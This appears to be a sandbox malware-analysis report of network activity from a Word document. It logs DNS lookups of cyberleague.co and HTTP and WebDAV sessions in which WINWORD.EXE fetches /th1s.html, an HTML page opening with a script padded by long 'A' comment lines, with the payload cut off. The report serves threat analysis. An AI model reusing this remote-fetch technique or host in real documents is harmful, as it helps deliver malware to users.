          Jun 3, 2022 22:57:47.632344007 CEST4434918413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:47.632424116 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:47.632431030 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:47.632575989 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:47.632586956 CEST4434918413.250.15.191192.168.2.22
          Jun 3, 2022 22:57:47.632595062 CEST49184443192.168.2.2213.250.15.191
          Jun 3, 2022 22:57:47.633361101 CEST49184443192.168.2.2213.250.15.191
          TimestampSource PortDest PortSource IPDest IP
          Jun 3, 2022 22:57:19.871170998 CEST5586853192.168.2.228.8.8.8
          Jun 3, 2022 22:57:19.930835962 CEST53558688.8.8.8192.168.2.22
          Jun 3, 2022 22:57:26.314532042 CEST4968853192.168.2.228.8.8.8
          Jun 3, 2022 22:57:26.456120968 CEST53496888.8.8.8192.168.2.22
          Jun 3, 2022 22:57:26.459547043 CEST5883653192.168.2.228.8.8.8
          Jun 3, 2022 22:57:26.538995981 CEST53588368.8.8.8192.168.2.22
          Jun 3, 2022 22:57:31.445116997 CEST5013453192.168.2.228.8.8.8
          Jun 3, 2022 22:57:31.463130951 CEST53501348.8.8.8192.168.2.22
          Jun 3, 2022 22:57:31.464679003 CEST5527553192.168.2.228.8.8.8
          Jun 3, 2022 22:57:31.789314032 CEST53552758.8.8.8192.168.2.22
          Jun 3, 2022 22:57:35.143301010 CEST5991553192.168.2.228.8.8.8
          Jun 3, 2022 22:57:35.200170040 CEST53599158.8.8.8192.168.2.22
          Jun 3, 2022 22:57:35.210647106 CEST5440853192.168.2.228.8.8.8
          Jun 3, 2022 22:57:35.227852106 CEST53544088.8.8.8192.168.2.22
          Jun 3, 2022 22:57:36.922116995 CEST5010853192.168.2.228.8.8.8
          Jun 3, 2022 22:57:36.939106941 CEST53501088.8.8.8192.168.2.22
          Jun 3, 2022 22:57:36.942188978 CEST5472353192.168.2.228.8.8.8
          Jun 3, 2022 22:57:37.069972992 CEST53547238.8.8.8192.168.2.22
          Jun 3, 2022 22:57:40.868483067 CEST5806253192.168.2.228.8.8.8
          Jun 3, 2022 22:57:40.897502899 CEST53580628.8.8.8192.168.2.22
          Jun 3, 2022 22:57:40.899883986 CEST5670353192.168.2.228.8.8.8
          Jun 3, 2022 22:57:40.918878078 CEST53567038.8.8.8192.168.2.22
          Jun 3, 2022 22:57:42.643587112 CEST5924153192.168.2.228.8.8.8
          Jun 3, 2022 22:57:42.662676096 CEST53592418.8.8.8192.168.2.22
          Jun 3, 2022 22:57:42.665538073 CEST5524453192.168.2.228.8.8.8
          Jun 3, 2022 22:57:42.682970047 CEST53552448.8.8.8192.168.2.22
          Jun 3, 2022 22:57:44.315067053 CEST5395853192.168.2.228.8.8.8
          Jun 3, 2022 22:57:44.334134102 CEST53539588.8.8.8192.168.2.22
          Jun 3, 2022 22:57:44.336416960 CEST5602053192.168.2.228.8.8.8
          Jun 3, 2022 22:57:44.353132010 CEST53560208.8.8.8192.168.2.22
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
          Jun 3, 2022 22:57:19.871170998 CEST192.168.2.228.8.8.80xdcddStandard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:26.314532042 CEST192.168.2.228.8.8.80xd494Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:26.459547043 CEST192.168.2.228.8.8.80x6c29Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:31.445116997 CEST192.168.2.228.8.8.80xf2caStandard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:31.464679003 CEST192.168.2.228.8.8.80xdc64Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:35.143301010 CEST192.168.2.228.8.8.80xbe50Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:35.210647106 CEST192.168.2.228.8.8.80x646cStandard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:36.922116995 CEST192.168.2.228.8.8.80x12f1Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:36.942188978 CEST192.168.2.228.8.8.80xe6e0Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:40.868483067 CEST192.168.2.228.8.8.80xbbd1Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:40.899883986 CEST192.168.2.228.8.8.80x41b6Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:42.643587112 CEST192.168.2.228.8.8.80x6703Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:42.665538073 CEST192.168.2.228.8.8.80x7820Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:44.315067053 CEST192.168.2.228.8.8.80x2c87Standard query (0)cyberleague.coA (IP address)IN (0x0001)
          Jun 3, 2022 22:57:44.336416960 CEST192.168.2.228.8.8.80x4c7aStandard query (0)cyberleague.coA (IP address)IN (0x0001)
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
          Jun 3, 2022 22:57:19.930835962 CEST8.8.8.8192.168.2.220xdcddNo error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:26.456120968 CEST8.8.8.8192.168.2.220xd494No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:26.538995981 CEST8.8.8.8192.168.2.220x6c29No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:31.463130951 CEST8.8.8.8192.168.2.220xf2caNo error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:31.789314032 CEST8.8.8.8192.168.2.220xdc64No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:35.200170040 CEST8.8.8.8192.168.2.220xbe50No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:35.227852106 CEST8.8.8.8192.168.2.220x646cNo error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:36.939106941 CEST8.8.8.8192.168.2.220x12f1No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:37.069972992 CEST8.8.8.8192.168.2.220xe6e0No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:40.897502899 CEST8.8.8.8192.168.2.220xbbd1No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:40.918878078 CEST8.8.8.8192.168.2.220x41b6No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:42.662676096 CEST8.8.8.8192.168.2.220x6703No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:42.682970047 CEST8.8.8.8192.168.2.220x7820No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:44.334134102 CEST8.8.8.8192.168.2.220x2c87No error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          Jun 3, 2022 22:57:44.353132010 CEST8.8.8.8192.168.2.220x4c7aNo error (0)cyberleague.co13.250.15.191A (IP address)IN (0x0001)
          • cyberleague.co
          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.224917113.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:20 UTC0OUTOPTIONS / HTTP/1.1
          User-Agent: Microsoft Office Protocol Discovery
          Host: cyberleague.co
          Content-Length: 0
          Connection: Keep-Alive
          2022-06-03 20:57:20 UTC0INHTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:20 GMT
          Content-Type: text/html
          Content-Length: 0
          Connection: close
          Allow: GET,POST,OPTIONS,HEAD,TRACE


          Session IDSource IPSource PortDestination IPDestination PortProcess
          1192.168.2.224917213.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:26 UTC0OUTHEAD /th1s.html HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Microsoft Office Existence Discovery
          Host: cyberleague.co
          2022-06-03 20:57:27 UTC0INHTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:27 GMT
          Content-Type: text/html
          Content-Length: 5092
          Connection: close
          Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
          ETag: "13e4-5e063d0e1ca1e"
          Accept-Ranges: bytes


          Session IDSource IPSource PortDestination IPDestination PortProcess
          10192.168.2.224918113.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:44 UTC9OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 63 79 62 65 72 6c 65 61 67 75 65 2e 63 6f 0d 0a 0d 0a
          Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: cyberleague.co
          2022-06-03 20:57:45 UTC9INHTTP/1.1 405 Method Not Allowed
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:45 GMT
          Content-Type: text/html; charset=iso-8859-1
          Content-Length: 225
          Connection: close
          Allow: GET,POST,OPTIONS,HEAD,TRACE
          2022-06-03 20:57:45 UTC9INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>


          Session IDSource IPSource PortDestination IPDestination PortProcess
          11192.168.2.224918213.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:45 UTC10OUTGET /th1s.html HTTP/1.1
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          Host: cyberleague.co
          If-Modified-Since: Wed, 01 Jun 2022 14:36:34 GMT
          If-None-Match: "13e4-5e063d0e1ca1e"
          Connection: Keep-Alive
          2022-06-03 20:57:45 UTC10INHTTP/1.1 304 Not Modified
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:45 GMT
          Connection: close
          Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
          ETag: "13e4-5e063d0e1ca1e"
          Accept-Ranges: bytes


          Session IDSource IPSource PortDestination IPDestination PortProcess
          12192.168.2.224918313.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:46 UTC10OUTHEAD /th1s.html HTTP/1.1
          User-Agent: Microsoft Office Existence Discovery
          Host: cyberleague.co
          Content-Length: 0
          Connection: Keep-Alive
          2022-06-03 20:57:46 UTC10INHTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:46 GMT
          Content-Type: text/html
          Content-Length: 5092
          Connection: close
          Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
          ETag: "13e4-5e063d0e1ca1e"
          Accept-Ranges: bytes


          Session IDSource IPSource PortDestination IPDestination PortProcess
          13192.168.2.224918413.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:47 UTC11OUTHEAD /th1s.html HTTP/1.1
          User-Agent: Microsoft Office Existence Discovery
          Host: cyberleague.co
          Content-Length: 0
          Connection: Keep-Alive
          2022-06-03 20:57:47 UTC11INHTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:47 GMT
          Content-Type: text/html
          Content-Length: 5092
          Connection: close
          Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
          ETag: "13e4-5e063d0e1ca1e"
          Accept-Ranges: bytes


          Session IDSource IPSource PortDestination IPDestination PortProcess
          2192.168.2.224917313.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:32 UTC0OUTOPTIONS / HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
          translate: f
          Host: cyberleague.co
          2022-06-03 20:57:32 UTC0INHTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:32 GMT
          Content-Type: text/html
          Content-Length: 0
          Connection: close
          Allow: GET,POST,OPTIONS,HEAD,TRACE


          Session IDSource IPSource PortDestination IPDestination PortProcess
          3192.168.2.224917413.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:35 UTC0OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 63 79 62 65 72 6c 65 61 67 75 65 2e 63 6f 0d 0a 0d 0a
          Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: cyberleague.co
          2022-06-03 20:57:35 UTC1INHTTP/1.1 405 Method Not Allowed
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:35 GMT
          Content-Type: text/html; charset=iso-8859-1
          Content-Length: 225
          Connection: close
          Allow: GET,POST,OPTIONS,HEAD,TRACE
          2022-06-03 20:57:35 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>


          Session IDSource IPSource PortDestination IPDestination PortProcess
          4192.168.2.224917513.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:37 UTC1OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 63 79 62 65 72 6c 65 61 67 75 65 2e 63 6f 0d 0a 0d 0a
          Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: cyberleague.co
          2022-06-03 20:57:37 UTC1INHTTP/1.1 405 Method Not Allowed
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:37 GMT
          Content-Type: text/html; charset=iso-8859-1
          Content-Length: 225
          Connection: close
          Allow: GET,POST,OPTIONS,HEAD,TRACE
          2022-06-03 20:57:37 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>


          Session IDSource IPSource PortDestination IPDestination PortProcess
          5192.168.2.224917613.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:38 UTC2OUTGET /th1s.html HTTP/1.1
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          Host: cyberleague.co
          Connection: Keep-Alive
          2022-06-03 20:57:38 UTC2INHTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:38 GMT
          Content-Type: text/html
          Content-Length: 5092
          Connection: close
          Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
          ETag: "13e4-5e063d0e1ca1e"
          Accept-Ranges: bytes
          2022-06-03 20:57:38 UTC2INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 0d 0a 20 20 20 20 2f 2f 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
          Data Ascii: <!DOCTYPE html><html><body> <script> //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA //AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


          Session IDSource IPSource PortDestination IPDestination PortProcess
          6192.168.2.224917713.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:39 UTC7OUTHEAD /th1s.html HTTP/1.1
          User-Agent: Microsoft Office Existence Discovery
          Host: cyberleague.co
          Content-Length: 0
          Connection: Keep-Alive
          2022-06-03 20:57:39 UTC7INHTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:39 GMT
          Content-Type: text/html
          Content-Length: 5092
          Connection: close
          Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
          ETag: "13e4-5e063d0e1ca1e"
          Accept-Ranges: bytes


          Session IDSource IPSource PortDestination IPDestination PortProcess
          7192.168.2.224917813.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:40 UTC8OUTHEAD /th1s.html HTTP/1.1
          User-Agent: Microsoft Office Existence Discovery
          Host: cyberleague.co
          Content-Length: 0
          Connection: Keep-Alive
          2022-06-03 20:57:40 UTC8INHTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:40 GMT
          Content-Type: text/html
          Content-Length: 5092
          Connection: close
          Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
          ETag: "13e4-5e063d0e1ca1e"
          Accept-Ranges: bytes


          Session IDSource IPSource PortDestination IPDestination PortProcess
          8192.168.2.224917913.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:41 UTC8OUTHEAD /th1s.html HTTP/1.1
          Connection: Keep-Alive
          User-Agent: Microsoft Office Existence Discovery
          Host: cyberleague.co
          2022-06-03 20:57:41 UTC8INHTTP/1.1 200 OK
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:41 GMT
          Content-Type: text/html
          Content-Length: 5092
          Connection: close
          Last-Modified: Wed, 01 Jun 2022 14:36:34 GMT
          ETag: "13e4-5e063d0e1ca1e"
          Accept-Ranges: bytes


          Session IDSource IPSource PortDestination IPDestination PortProcess
          9192.168.2.224918013.250.15.191443C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          TimestampkBytes transferredDirectionData
          2022-06-03 20:57:43 UTC8OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 63 79 62 65 72 6c 65 61 67 75 65 2e 63 6f 0d 0a 0d 0a
          Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: cyberleague.co
          2022-06-03 20:57:43 UTC9INHTTP/1.1 405 Method Not Allowed
          Server: nginx/1.18.0 (Ubuntu)
          Date: Fri, 03 Jun 2022 20:57:43 GMT
          Content-Type: text/html; charset=iso-8859-1
          Content-Length: 225
          Connection: close
          Allow: GET,POST,OPTIONS,HEAD,TRACE
          2022-06-03 20:57:43 UTC9INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 35 20 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 65 74 68 6f 64 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 6d 65 74 68 6f 64 20 50 52 4f 50 46 49 4e 44 20 69 73 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 66 6f 72 20 74 68 69 73 20 55 52 4c 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method PROPFIND is not allowed for this URL.</p></body></html>


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Target ID:0
          Start time:22:58:11
          Start date:03/06/2022
          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
          Wow64 process (32bit):false
          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
          Imagebase:0x13fb90000
          File size:1423704 bytes
          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          No disassembly